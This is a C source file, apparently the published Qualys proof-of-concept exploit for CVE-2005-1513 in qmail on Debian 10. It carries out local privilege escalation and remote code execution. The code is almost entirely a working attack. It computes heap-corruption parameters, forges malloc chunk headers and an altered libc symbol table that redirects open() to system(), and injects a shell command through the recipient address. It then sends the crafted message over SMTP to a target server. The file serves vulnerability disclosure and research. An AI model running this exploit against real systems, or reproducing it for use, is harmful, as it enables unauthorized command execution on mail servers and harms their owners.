/*
 * LPE and RCE in qmail (CVE-2005-1513), Debian 10 amd64 version
 * https://www.qualys.com/2020/05/19/cve-2005-1513/remote-code-execution-qmail.txt
 * (cd simulate && gcc -fpie -pie -s -o qmail-local *.c)
 * gcc -Wall -Wextra -Werror -s -o exploit exploit.c
 * Copyright (C) 2020 Qualys, Inc.
 *
 * This program includes parts of the GNU C Library.
 * Copyright (C) 1996-2020 Free Software Foundation, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <pwd.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/sendfile.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#define die() do { \
    printf("died in %s:%u, %s().\n", __FILE__, __LINE__, __func__); \
    exit(EXIT_FAILURE); \
} while (0)

#define PAGESIZE ((size_t)4096)

#define ALIGN_DOWN(base, size)  ((base) & -((__typeof__ (base)) (size)))
#define ALIGN_UP(base, size)    ALIGN_DOWN ((base) + (size) - 1, (size))

# define INTERNAL_SIZE_T size_t
#define SIZE_SZ (sizeof (INTERNAL_SIZE_T))

#define MALLOC_ALIGNMENT (2 * SIZE_SZ < __alignof__ (long double) \
                          ? __alignof__ (long double) : 2 * SIZE_SZ)

#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)

struct malloc_chunk {

  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */

  struct malloc_chunk* fd;         /* double links -- used only if free. */
  struct malloc_chunk* bk;

  /* Only used for large blocks: pointer to next larger size.  */
  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
  struct malloc_chunk* bk_nextsize;
};

#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))

#define MINSIZE  \
  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))

#define request2size(req)                                         \
  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
   MINSIZE :                                                      \
   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

#define IS_MMAPPED 0x2

#define STRALLOC_READY_N2A(n) (30 + (n) + ((n) >> 3))

#define ALIGNMENT 16

static size_t
alloc2size(const unsigned int n)
{
    const unsigned int aligned_n = ALIGNMENT + n - (n & (ALIGNMENT - 1));
    if (aligned_n <= n) die();

    const size_t bytes = aligned_n;
    const size_t nb = request2size(bytes);
    if (nb <= bytes) die();

    if (MALLOC_ALIGNMENT != 2 * SIZE_SZ) die();
    const size_t size = ALIGN_UP (nb + SIZE_SZ, PAGESIZE);
    if (size <= nb) die();
    return size;
}

/* XXX
 * readelf -a /lib/x86_64-linux-gnu/libc.so.6 | grep -A2 DYNSYM
 *   [ 4] .dynsym           DYNSYM           0000000000003fa8  00003fa8
 *        000000000000dcf8  0000000000000018   A       5     1     8
 *   [ 5] .dynstr           STRTAB           0000000000011ca0  00011ca0
 * dd if=/lib/x86_64-linux-gnu/libc.so.6 bs=$((0x00011ca0 & -4096)) count=1 | xxd -i > libc_header.h
 */
static char libc_header[] = {
    #include "libc_header.h"
};

static void
check_libc_header(void)
{
    if (sizeof(libc_header) % PAGESIZE) die();
    static char buf[sizeof(libc_header)];

    /* XXX
     * ldd "$(command -v qmail-local)" | grep libc
     *   libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8b8d0b7000)
     */
    const int fd = open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY);
    if (fd <= -1) die();
    if (read(fd, buf, sizeof(buf)) != (ssize_t)sizeof(buf)) die();
    if (close(fd) != 0) die();

    if (sizeof(buf) != sizeof(libc_header)) die();
    if (memcmp(buf, libc_header, sizeof(buf)) == 0) return;
    puts("libc version mismatch. Please install the same Linux distribution as your target.");
    die();
}

struct xp {
    #define NLINES (256)
    unsigned int lines[NLINES];
    unsigned int long_line_len;
    unsigned int libc_line_len;
    size_t libc_header_offset;
    size_t x_chunk_offset;
    size_t y_chunk_offset;
    size_t x_chunk[2];
    size_t y_chunk[2];
    size_t headers_len;
};

static size_t
fix_badchars(void * const buf, size_t len)
{
    size_t fixed_lfs = 0;
    char * cp;

    for (cp = buf; len; cp++, len--) {
        if (*cp == '\n') {
            *cp = 'z';
            fixed_lfs++;
        }
    }
    return fixed_lfs;
}

static unsigned int
read_uint(const int fd)
{
    unsigned int val = 0;
    if (read(fd, &val, sizeof(val)) !=
              (ssize_t)sizeof(val)) die();
    return val;
}

static int
compute_temporary_exploit_parameters(const int fd,
    struct xp * const xp, const unsigned int received_lines[])
{
    const unsigned int x_y = read_uint(fd);
    const unsigned int x_a = read_uint(fd);
    const unsigned int y_a = read_uint(fd);
    const unsigned int y_len = read_uint(fd);
    if (y_a >= x_a) die();

    const size_t x_size = alloc2size(x_a);
    const size_t y_size = alloc2size(y_a);
    if (x_y != y_size) die();

    const unsigned int z_n = (y_len + 1024) + 1024 + 1;
    if (z_n <= y_len) die();
    const unsigned int z_a = STRALLOC_READY_N2A(z_n);
    if (z_a >= z_n) die();
    const size_t z_size = alloc2size(z_a);
    if (z_n <= 2) die();
    xp->long_line_len = z_n - 1;

    const unsigned int t_n = (z_a / 1024 + 1) * 1024;
    if (t_n <= z_a) die();
    const unsigned int t_a = STRALLOC_READY_N2A(t_n);
    if (t_a <= t_n) die();
    const size_t t_size = alloc2size(t_a);
    if (t_a <= 2) die();
    xp->libc_line_len = t_a - 1;
    if (t_size <= sizeof(libc_header)) die();
    xp->libc_header_offset = t_size - sizeof(libc_header) - 2 * SIZE_SZ;
    if (xp->libc_header_offset >= xp->libc_line_len) die();

    const size_t x_u = ((size_t)8 << 20);
    if (x_u >= y_size / 2) die();
    xp->x_chunk[0] = y_size;
    xp->x_chunk[1] = (x_u - xp->x_chunk[0]) | IS_MMAPPED;
    if (fix_badchars(xp->x_chunk, sizeof(xp->x_chunk))) return 0;
    xp->x_chunk_offset = y_size - sizeof(xp->x_chunk);
    if (xp->x_chunk_offset >= xp->long_line_len) die();

    const size_t y_u = t_size;
    xp->y_chunk[0] = -(y_size + x_size + sizeof(libc_header) - y_u);
    xp->y_chunk[1] = (y_u - xp->y_chunk[0]) | IS_MMAPPED;
    if (fix_badchars(xp->y_chunk, sizeof(xp->y_chunk))) return 0;
    xp->y_chunk_offset = z_size - x_u - sizeof(xp->y_chunk);
    if (xp->y_chunk_offset >= xp->x_chunk_offset) die();

    xp->headers_len = 0;
    unsigned int i;
    for (i = 0; ; i++) {
        if (i >= NLINES) die();
        xp->lines[i] = read_uint(fd);
        if (!xp->lines[i]) {
            if (!i) die();
            break;
        }
        xp->headers_len += xp->lines[i];
    }
    for (i = 0; received_lines[i]; i++) {
        if (i >= NLINES) die();
        if (xp->lines[i] != received_lines[i]) die();
    }
    xp->headers_len += xp->long_line_len;
    xp->headers_len += xp->libc_line_len;
    return 1;
}

static void
simulate_qmail_local(struct xp * const xp, const unsigned int received_lines[],
    const char * const user, const char * const homedir,
    const char * const local, const char * const domain)
{
    unsigned int try = 1024;
    while (try--) {
        int fds[2];
        if (socketpair(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0, fds) != 0) die();

        const pid_t pid = fork();
        if (pid <= -1) die();

        const int fd = fds[!!pid];
        if (close(fds[!pid]) != 0) die();

        if (pid == 0) {
            if (dup2(fd, 0) != 0) die();
            const char * const argv[] = { "simulate/qmail-local", "--", user, homedir, local, "dash", "ext", domain, "sender", "defaultdelivery", NULL };
            /* XXX
             * strings -a /proc/"$(pidof -s qmail-lspawn)"/environ
             * PATH=/var/lib/qmail/bin:/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/bin:/usr/bin
             */
            const char * const envp[] = { "PATH=/var/lib/qmail/bin:/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/bin:/usr/bin", NULL };
            execve(*argv, (char * const *)argv, (char * const *)envp);
            die();
        }

        unsigned int i;
        for (i = 0; ; i++) {
            if (write(fd, &received_lines[i], sizeof(received_lines[i])) !=
                                     (ssize_t)sizeof(received_lines[i])) die();
            if (!received_lines[i]) {
                if (!i) die();
                break;
            }
        }

        int success = 0;
        int status = 0;
        if (waitpid(pid, &status, 0) != pid) die();
        if (!WIFEXITED(status)) die();
        switch (WEXITSTATUS(status)) {
        case 0:
            success = compute_temporary_exploit_parameters(fd, xp, received_lines);
            break;
        case 100:
            break;
        default:
            die();
        }
        if (close(fd) != 0) die();
        if (success) return;
    }
    die();
}

static void
compute_exploit_parameters(struct xp * const xp, const unsigned int received_lines[],
    const char * const user, const char * const homedir,
    const char * const local, const char * const domain)
{
    xp->headers_len = -1;

    unsigned int i;
    for (i = 0; i < 256; i++) {
        static struct xp tp;
        simulate_qmail_local(&tp, received_lines, user, homedir, local, domain);
        if (tp.headers_len < xp->headers_len) {
            *xp = tp;
            printf("headers %zu long_line %u libc_line %u (%u)\n",
                xp->headers_len, xp->long_line_len, xp->libc_line_len, i);
        }
    }
    if (xp->headers_len > ((size_t)5 << 30)) die();
}

static const char *
allocate_local_part(const char * const user)
{
    char * local = NULL;
    if (asprintf(&local, "%s-;sh;exit 10;", user) <= 0) die();
    if (!local) die();
    return local;
}

static int
create_message_file(const struct xp * const xp,
    const unsigned int received_lines[], const char * const lf)
{
    const size_t lf_len = strlen(lf);
    if (lf_len < 1) die();
    if (lf_len > 2) die();

    const int fd = open(".message", O_RDWR | O_CREAT | O_EXCL | O_CLOEXEC, S_IRUSR);
    if (fd <= -1) die();
    if (unlink(".message") != 0) die();

    unsigned int i;
    for (i = 0; received_lines[i]; i++) {
        printf("received %u\n", received_lines[i]);
        if (i >= NLINES) die();
        if (xp->lines[i] != received_lines[i]) die();
    }
    if (i < 1) die();
    if (i > 3) die();
    for ( ; xp->lines[i]; i++) {
        const unsigned int line_len = xp->lines[i];
        if (line_len <= 1) die();
        if (lseek(fd, line_len - 1, SEEK_CUR) == (off_t)-1) die();
        if (write(fd, lf, lf_len) != (ssize_t)lf_len) die();
    }

    const off_t long_line_offset = lseek(fd, 0, SEEK_CUR);
    if (long_line_offset == (off_t)-1) die();
    if (lseek(fd, xp->long_line_len - 1, SEEK_CUR) == (off_t)-1) die();
    if (write(fd, lf, lf_len) != (ssize_t)lf_len) die();

    const off_t libc_line_offset = lseek(fd, 0, SEEK_CUR);
    if (libc_line_offset == (off_t)-1) die();
    if (lseek(fd, xp->libc_line_len - 1, SEEK_CUR) == (off_t)-1) die();
    if (write(fd, lf, lf_len) != (ssize_t)lf_len) die();

    if (write(fd, lf, lf_len) != (ssize_t)lf_len) die();

    static char nop_slide[1024];
    memset(nop_slide, '#', sizeof(nop_slide));
    if (write(fd, nop_slide, sizeof(nop_slide)) != (ssize_t)sizeof(nop_slide)) die();
    if (write(fd, lf, lf_len) != (ssize_t)lf_len) die();

    /* XXX */
    static const char shell_script[] =
        "for i in A R B I T R A R Y; do\n"
        "    echo -n $i/ && id || break\n"
        "done >> /tmp/qmail.`id -u`.$$\n";
    const char * line = shell_script;
    while (*line != '\0') {
        static const char crlf[] = "\r\n";
        const size_t line_len_1 = strcspn(line, crlf);
        if (line_len_1 <= 0) die();
        if (line_len_1 == 1 && *line == '.') die();

        if (write(fd, line, line_len_1) != (ssize_t)line_len_1) die();
        if (write(fd, lf, lf_len) != (ssize_t)lf_len) die();

        line += line_len_1;
        const size_t crlf_len = strspn(line, crlf);
        if (crlf_len <= 0) die();
        line += crlf_len;
    }

    const off_t message_size = lseek(fd, 0, SEEK_CUR);
    if (message_size == (off_t)-1) die();
    if (message_size >= SSIZE_MAX) die();
    if (message_size <= 0) die();
    if (message_size != lseek(fd, 0, SEEK_END)) die();
    printf("message %zu\n", (size_t)message_size);

    if (lseek(fd, long_line_offset + xp->x_chunk_offset, SEEK_SET) == (off_t)-1) die();
    if (write(fd, xp->x_chunk, sizeof(xp->x_chunk)) != (ssize_t)sizeof(xp->x_chunk)) die();

    if (lseek(fd, long_line_offset + xp->y_chunk_offset, SEEK_SET) == (off_t)-1) die();
    if (write(fd, xp->y_chunk, sizeof(xp->y_chunk)) != (ssize_t)sizeof(xp->y_chunk)) die();

    /* XXX
     * readelf -a /lib/x86_64-linux-gnu/libc.so.6 | grep -E 'DYNSYM| open@| system@'
     *   [ 4] .dynsym           DYNSYM           0000000000003fa8  00003fa8
     *   1418: 00000000000449c0    45 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.2.5
     *   1778: 00000000000ea160   302 FUNC    WEAK   DEFAULT   13 open@@GLIBC_2.2.5
     */
    size_t * const open_dynsym = (void *)(libc_header + 0x00003fa8 + 1778 * 0x0000000000000018);
    if ((void *)open_dynsym >= (void *)(libc_header + sizeof(libc_header))) die();
    open_dynsym[1] = 0x00000000000449c0;
    if (fix_badchars(open_dynsym, 0x0000000000000018)) die();
    const size_t fixed_badchars = fix_badchars(libc_header, sizeof(libc_header));
    printf("badchars %zu\n", fixed_badchars);

    if (lseek(fd, libc_line_offset + xp->libc_header_offset, SEEK_SET) == (off_t)-1) die();
    const size_t libc_header_len = xp->libc_line_len - xp->libc_header_offset - 1;
    if (libc_header_len >= sizeof(libc_header)) die();
    if (write(fd, libc_header, libc_header_len) != (ssize_t)libc_header_len) die();

    if (message_size != lseek(fd, 0, SEEK_END)) die();
    if (lseek(fd, 0, SEEK_SET) != 0) die();
    return fd;
}

static unsigned int
strlen_ulong(const unsigned long val)
{
    static char buf[64];
    const int len = snprintf(buf, sizeof(buf), "%lu", val);
    if (len <= 0 || (unsigned int)len >= sizeof(buf)) die();
    return len;
}

static void
check_strlen_ulong(const unsigned long val, const unsigned long check_val)
{
    if (strlen_ulong(val) == strlen_ulong(check_val)) return;
    puts("Received lines may differ in length. If the exploit fails, please try again.");
    die();
}

/* local exploit *************************************************************/

struct qq_local {
    pid_t pid;
    int socket_fd;
    int envelope_fd;
};

static unsigned int
get_local_mday(void)
{
    static struct tm dt;
    const time_t now = time(NULL);
    if (gmtime_r(&now, &dt) != &dt) die();

    const unsigned int mday = dt.tm_mday;
    if (mday < 1 || mday > 31) die();
    return mday;
}

static void
send_fd(const int socket_fd, const int fd)
{
    if (fd <= -1) die();
    static const char buf[] = "send";
    static const struct iovec iov = {
        .iov_base = (char *)buf,
        .iov_len = 1,
    };

    static char control[CMSG_SPACE(sizeof(int))];
    memset(control, 0, sizeof(control));

    static const struct msghdr msg = {
        .msg_iov = (struct iovec *)&iov,
        .msg_iovlen = 1,
        .msg_control = control,
        .msg_controllen = sizeof(control),
    };

    struct cmsghdr * const cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg) die();
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    *(int *)CMSG_DATA(cmsg) = fd;

    if (sendmsg(socket_fd, &msg, MSG_NOSIGNAL) != 1) die();
}

static int
recv_fd(const int socket_fd)
{
    static char buf[] = "recv";
    memset(buf, 0, sizeof(buf));

    static const struct iovec iov = {
        .iov_base = buf,
        .iov_len = sizeof(buf),
    };

    static char control[CMSG_SPACE(sizeof(int))];
    memset(control, 0, sizeof(control));

    struct msghdr msg = {
        .msg_iov = (struct iovec *)&iov,
        .msg_iovlen = 1,
        .msg_control = control,
        .msg_controllen = sizeof(control),
    };

    if (recvmsg(socket_fd, &msg, MSG_CMSG_CLOEXEC) != 1) die();
    if (buf[0] != 's') die();

    const struct cmsghdr * const cmsg = CMSG_FIRSTHDR(&msg);
    if (!cmsg) die();
    if (cmsg->cmsg_level != SOL_SOCKET) die();
    if (cmsg->cmsg_type != SCM_RIGHTS) die();
    if (cmsg->cmsg_len != CMSG_LEN(sizeof(int))) die();

    const int fd = *(const int *)CMSG_DATA(cmsg);
    if (fd <= -1) die();
    return fd;
}

static void
fork_qmail_queue(struct qq_local * const qq)
{
    int socket_fds[2];
    if (socketpair(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0, socket_fds) != 0) die();
    int envelope_fds[2];
    if (pipe2(envelope_fds, O_CLOEXEC) != 0) die();

    const pid_t pid = fork();
    if (pid <= -1) die();

    const int socket_fd = socket_fds[!!pid];
    if (close(socket_fds[!pid]) != 0) die();
    const int envelope_fd = envelope_fds[!!pid];
    if (close(envelope_fds[!pid]) != 0) die();

    if (pid != 0) {
        qq->pid = pid;
        qq->socket_fd = socket_fd;
        qq->envelope_fd = envelope_fd;
        return;
    }

    const int message_fd = recv_fd(socket_fd);
    if (dup2( message_fd, 0) != 0) die();
    if (dup2(envelope_fd, 1) != 1) die();

    /* XXX
     * command -v qmail-queue
     * /usr/sbin/qmail-queue
     */
    const char * const argv[] = { "/usr/sbin/qmail-queue", NULL };
    const char * const envp[] = { NULL };
    execve(*argv, (char * const *)argv, (char * const *)envp);
    die();
}

static void
local_exploit(const int argc, const char * const * const argv)
{
    if (argc != 1 + 2) die();
    const char * const user = argv[1];
    const char * const domain = argv[2];

    const struct passwd * const pw = getpwnam(user);
    if (!pw) die();
    const char * const homedir = strdup(pw->pw_dir);
    if (!homedir) die();
    const char * const local = allocate_local_part(user);

    static struct qq_local qq;
    fork_qmail_queue(&qq);
    const unsigned int mday = get_local_mday();

    char * received = NULL;
    const int received_len = asprintf(&received,
        "Received: (qmail %lu invoked by uid %lu); %u Sep 1995 04:46:54 -0000\n",
        (unsigned long)qq.pid, (unsigned long)getuid(), mday);
    if (received_len <= 0) die();
    if (!received) die();
    const unsigned int received_lines[] = { received_len, 0 };

    static struct xp xp;
    compute_exploit_parameters(&xp, received_lines, user, homedir, local, domain);

    const int message_fd = create_message_file(&xp, received_lines, "\n");
    send_fd(qq.socket_fd, message_fd);
    if (close(message_fd) != 0) die();
    if (close(qq.socket_fd) != 0) die();

    char * envelope = NULL;
    const int envelope_len = asprintf(&envelope, "F%cT%s@%s%c%c", (int)'\0', local, domain, (int)'\0', (int)'\0');
    if (envelope_len <= 0) die();
    if (!envelope) die();
    printf("envelope %d\n", envelope_len);

    if (write(qq.envelope_fd, envelope, envelope_len) != envelope_len) die();
    if (close(qq.envelope_fd) != 0) die();

    int status = 0;
    if (waitpid(qq.pid, &status, 0) != qq.pid) die();
    if (!WIFEXITED(status)) die();
    printf("status %d\n", WEXITSTATUS(status));
    if (WEXITSTATUS(status) != 0) die();

    check_strlen_ulong(mday, get_local_mday());
}

/* remote exploit ************************************************************/

static struct addrinfo *
common_getaddrinfo(const char * const host, const char * const port)
{
    const struct addrinfo hints = {
        .ai_family = AF_INET,
        .ai_socktype = SOCK_STREAM,
        .ai_protocol = IPPROTO_TCP,
        .ai_flags = AI_NUMERICHOST | AI_NUMERICSERV,
    };
    struct addrinfo * addr = NULL;
    if (getaddrinfo(host, port, &hints, &addr) != 0) die();
    if (addr == NULL || addr->ai_next != NULL) die();
    return addr;
}

static void
common_send(const int fd, const char * const format, va_list ap)
{
    if (fd <= -1) die();
    static char buf[1024];
    const int len = vsnprintf(buf, sizeof(buf), format, ap);
    if (len <= 0 || (unsigned)len >= sizeof(buf)) die();
    printf("--> %s%s", buf, buf[len-1] != '\n' ? "\n" : "");

    const char * data = buf;
    size_t size = len;

    for (;;) {
        const ssize_t sent = send(fd, data, size, MSG_NOSIGNAL);
        if (sent <= 0) die();
        if ((size_t)sent > size) die();
        data += sent;
        size -= sent;
        if (size <= 0) return;
    }
    die();
}

static const struct addrinfo * server_addr = NULL;
static int client_fd = -1;

static void
client_connect(void)
{
    if (!server_addr) die();
    if (client_fd != -1) die();

    client_fd = socket(server_addr->ai_family, server_addr->ai_socktype,
        server_addr->ai_protocol);
    if (client_fd <= -1) die();

    if (connect(client_fd, server_addr->ai_addr,
        server_addr->ai_addrlen) != 0) die();
}

static void
client_send(const char * const format, ...)
{
    if (client_fd <= -1) die();

    va_list ap;
    va_start(ap, format);
    common_send(client_fd, format, ap);
    va_end(ap);
}

static char client_reply[1024];

static void
client_recv(const char * const prefix)
{
    if (client_fd <= -1) die();
    const size_t prefix_len = strlen(prefix);
    if (prefix_len < 3) die();

    char * data = client_reply;
    size_t size = sizeof(client_reply);
    const char * line = data;

    for (;;) {
        const ssize_t rcvd = recv(client_fd, data, size, 0);
        if (rcvd <= 0) die();
        if ((size_t)rcvd >= size) die();
        data += rcvd;
        size -= rcvd;
        data[0] = '\0';
        if (data[-1] != '\n') continue;

        for (;;) {
            const char * const new_line = strchr(line, '\n');
            if (new_line == NULL) break;
            if (new_line - line < 4) die();
            printf("<-- %.*s", (int)(new_line - line + 1), line);
            if (strncmp(line, prefix, prefix_len) != 0) die();

            if (line[3] == ' ') {
                if (new_line + 1 != data) die();
                return;
            }
            if (line[3] != '-') die();
            line = new_line + 1;
        }
        if (line != data) die();
    }
    die();
}

static void
client_close(void)
{
    if (client_fd <= -1) die();
    if (close(client_fd) != 0) die();
    client_fd = -1;
}

struct qq_remote {
    unsigned long pid;
    unsigned int mday;
};

static void
parse_dotcrlf_reply(struct qq_remote * const qq, const char * const reply)
{
    unsigned long now = 0;
    unsigned long pid = 0;
    if (sscanf(reply, "250 ok %lu qp %lu\r\n", &now, &pid) != 2) die();
    if (!now || strlen_ulong(now) != 10) die();
    if (!pid || strlen_ulong(pid) > 7) die();

    static struct tm dt;
    const time_t t = now;
    if (gmtime_r(&t, &dt) != &dt) die();
    const unsigned int mday = dt.tm_mday;
    if (mday < 1 || mday > 31) die();

    qq->mday = mday;
    qq->pid = pid;
}

static void
approximate_qmail_queue(struct qq_remote * const qq,
    const char * const user, const char * const domain)
{
    client_connect();
    client_recv("220 ");

    client_send("MAIL FROM:<>\n");
    client_recv("250 ok");

    client_send("RCPT TO:<%s@%s>\n", user, domain);
    client_recv("250 ok");

    client_send("DATA\n");
    client_recv("354 go ahead");

    client_send("Delivered-To: %s@%s\r\n", user, domain);
    client_send(".\r\n");
    client_recv("250 ok ");
    parse_dotcrlf_reply(qq, client_reply);

    client_send("QUIT\n");
    client_recv("221 ");
    client_close();
}

static void
remote_exploit(int argc, const char * const * argv)
{
    const char * client_ip = NULL;
    const char * client_host = NULL;
    const char * server_host = NULL;
    char * homedir = NULL;

    int opt;
    while ((opt = getopt(argc, (char * const *)argv, "i:h:s:d:")) != -1) {
        switch (opt) {
        case 'i':
            client_ip = optarg;
            break;
        case 'h':
            client_host = optarg;
            if (client_host[0] == '\0') {
                client_host = "unknown";
            }
            break;
        case 's':
            server_host = optarg;
            break;
        case 'd':
            homedir = optarg;
            if (homedir[0] != '/') die();
            break;
        default:
            die();
        }
    }
    if (!client_ip) die();
    if (!client_host) die();
    if (!server_host) die();

    if (argc <= optind) die();
    argc -= optind;
    argv += optind;
    if (argc != 3) die();

    const char * const user = argv[0];
    const char * const domain = argv[1];
    const char * const server_ip = argv[2];
    server_addr = common_getaddrinfo(server_ip, "25");

    if (!homedir) {
        if (asprintf(&homedir, "/home/%s", user) <= 0) die();
        if (!homedir) die();
    }
    const char * const local = allocate_local_part(user);

    static struct qq_remote qq;
    approximate_qmail_queue(&qq, user, domain);

    char * receivedq = NULL;
    const int receivedq_len = asprintf(&receivedq,
        "Received: (qmail %lu invoked from network); %u Sep 1995 04:46:54 -0000\n", qq.pid, qq.mday);
    if (receivedq_len <= 0) die();
    if (!receivedq) die();

    char * receivedf = NULL;
    const int receivedf_len = asprintf(&receivedf,
        "Received: from %s (%s)\n", client_host, client_ip);
    if (receivedf_len <= 0) die();
    if (!receivedf) die();

    char * receivedb = NULL;
    const int receivedb_len = asprintf(&receivedb,
        "  by %s with SMTP; %u Sep 1995 04:46:54 -0000\n", server_host, qq.mday);
    if (receivedb_len <= 0) die();
    if (!receivedb) die();

    const unsigned int received_lines[] = { receivedq_len, receivedf_len, receivedb_len, 0 };

    static struct xp xp;
    compute_exploit_parameters(&xp, received_lines, user, homedir, local, domain);
  {
    static struct qq_remote check_qq;
    approximate_qmail_queue(&check_qq, user, domain);
    check_strlen_ulong(qq.pid, check_qq.pid);
    check_strlen_ulong(qq.mday, check_qq.mday);
  }

    const int message_fd = create_message_file(&xp, received_lines, "\r\n");
    const off_t message_size = lseek(message_fd, 0, SEEK_END);
    if (message_size == (off_t)-1) die();

    client_connect();
    client_recv("220 ");

    client_send("MAIL FROM:<>\n");
    client_recv("250 ok");

    client_send("RCPT TO:<%s>\n", local);
    client_recv("250 ok");

    client_send("DATA\n");
    client_recv("354 go ahead");

    off_t message_offset = 0;
    while (message_offset < message_size) {
        const off_t start = message_offset;
        const size_t size = message_size - message_offset;
        const ssize_t sent = sendfile(client_fd, message_fd, &message_offset, size);
        if (sent <= 0 || (size_t)sent > size) die();
        if (message_offset != start + sent) die();
    }
    if (message_offset != message_size) die();
    if (close(message_fd) != 0) die();

    client_send(".\r\n");
    client_recv("250 ok ");
  {
    static struct qq_remote check_qq;
    parse_dotcrlf_reply(&check_qq, client_reply);
    check_strlen_ulong(qq.pid, check_qq.pid);
    check_strlen_ulong(qq.mday, check_qq.mday);
  }

    client_send("QUIT\n");
    client_recv("221 ");
    client_close();
}

int
main(const int argc, const char * const * const argv)
{
    setlinebuf(stdout);
    puts("LPE and RCE in qmail (CVE-2005-1513), Debian 10 amd64 version");
    puts("https://www.qualys.com/2020/05/19/cve-2005-1513/remote-code-execution-qmail.txt");
    puts("Copyright (C) 2020 Qualys, Inc.");

    if (SIZE_SZ != 8) die();
    check_libc_header();

    if (argc == 1 + 2) {
        local_exploit(argc, argv);
    } else {
        remote_exploit(argc, argv);
    }
    exit(EXIT_SUCCESS);
}
